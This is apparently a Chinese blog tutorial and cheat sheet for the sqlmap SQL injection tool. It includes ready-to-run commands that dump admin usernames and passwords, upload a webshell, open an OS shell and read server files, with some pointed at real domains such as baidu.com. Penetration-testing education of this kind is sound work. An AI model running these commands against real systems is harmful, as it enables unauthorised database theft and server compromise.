sqlmap整理
- sqlmap支持五種不同的注入模式:
- sqlmap支持的數據庫有:
- 基本格式
- 跟隨302跳轉
- cookie注入
- 從post數據包中注入
- 這樣自己嘗試就注入成功了
- 獲取數據庫基本信息
- sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 –dbs
- sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test –tables
- sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test -T admin –columns
- sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test -T admin -C “username,password” –dump
- 從數據庫中搜索字段
- 讀取與寫入文件
- 示例:
- sqlmap詳細命令:
- Options(選項):
- 寫文章不容易關注一下我唄 帶你更新更多好玩的網絡安全教程 我是FR13ENDS 下次不見不散
- 我是FR13ENDS我們不見不散
sqlmap支持五種不同的注入模式:
- 1、基於布爾的盲注,即可以根據返回頁面判斷條件真假的注入。
- 2、基於時間的盲注,即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增加)來判斷。
- 3、基於報錯注入,即頁面會返回錯誤信息,或者把注入的語句的結果直接返回在頁面中。
- 4、聯合查詢注入,可以使用union的情況下的注入。
- 5、堆查詢注入,可以同時執行多條語句的執行時的注入。
sqlmap支持的數據庫有:
- MySQL
- Oracle
- PostgreSQL
- Microsoft SQL Server
- Microsoft Access,
- IBM DB2
- SQLite
- Firebird
- Sybase
- SAP MaxDB
基本格式
跟隨302跳轉
- 當注入頁面錯誤的時候,自動跳轉到另一個頁面的時候需要跟隨302,
當注入錯誤的時候,先報錯再跳轉的時候,不需要跟隨302。
目的就是:要追蹤到錯誤信息。
cookie注入
- 當程序有防get注入的時候,可以使用cookie注入
sqlmap -u “http://www.baidu.com/shownews.asp” –cookie “id=11” –level 2(只有level達到2纔會檢測cookie)
從post數據包中注入
- 可以使用burpsuite或者temperdata等工具來抓取post包
sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql 指定username參數
這樣自己嘗試就注入成功了
獲取數據庫基本信息
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 –dbs
- 查詢有哪些數據庫
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test –tables
- 查詢test數據庫中有哪些表
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test -T admin –columns
- 查詢test數據庫中admin表有哪些字段
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test -T admin -C “username,password” –dump
- dump出字段username與password中的數據
從數據庫中搜索字段
- sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms –search -C admin,password
在dedecms數據庫中搜索字段admin或者password。
讀取與寫入文件
- 首先找需要網站的物理路徑,其次需要有可寫或可讀權限。
–file-read=RFILE 從後端的數據庫管理系統文件系統讀取文件 (物理路徑)
–file-write=WFILE 編輯後端的數據庫管理系統文件系統上的本地文件 (mssql xp_shell)
–file-dest=DFILE 後端的數據庫管理系統寫入文件的絕對路徑示例:
sqlmap -r “c:\request.txt” -p id –dbms mysql –file-dest “e:\php\htdocs\dvwa\inc\include\1.php” –file-write “f:\webshell\1112.php”
使用shell命令:
sqlmap -r “c:\tools\request.txt” -p id –dms mysql –os-shell
接下來指定網站可寫目錄:
E:\php\htdocs\dvwa注:mysql不支持列目錄,僅支持讀取單個文件。sqlserver可以列目錄,不能讀寫文件,但需要一個(xp_dirtree函數)
sqlmap詳細命令:
- –is-dba 當前用戶權限(是否爲root權限)
- –dbs 所有數據庫
- –current-db 網站當前數據庫
- –users 所有數據庫用戶
- –current-user 當前數據庫用戶
- –random-agent 構造隨機user-agent
- –passwords 數據庫密碼
- –proxy http://local:8080 –threads 10 (可以自定義線程加速) 代理
- –time-sec=TIMESEC DBMS響應的延遲時間(默認爲5秒)
- ——————————————————————————————————
Options(選項):
- –version 顯示程序的版本號並退出
- -h, –help 顯示此幫助消息並退出
- -v VERBOSE 詳細級別:0-6(默認爲1)
- 保存進度繼續跑:
- sqlmap -u “http://url/news?id=1“ –dbs-o “sqlmap.log” 保存進度
- sqlmap -u “http://url/news?id=1“ –dbs-o “sqlmap.log” –resume 恢復已保存進度
寫文章不容易關注一下我唄
帶你更新更多好玩的網絡安全教程
我是FR13ENDS
下次不見不散
我是FR13ENDS我們不見不散
ps:我叫FR13ENDS因爲改不了id所以只能這樣了見諒吧
我們有一個交流羣
- 鏈接: l點擊我加入羣l.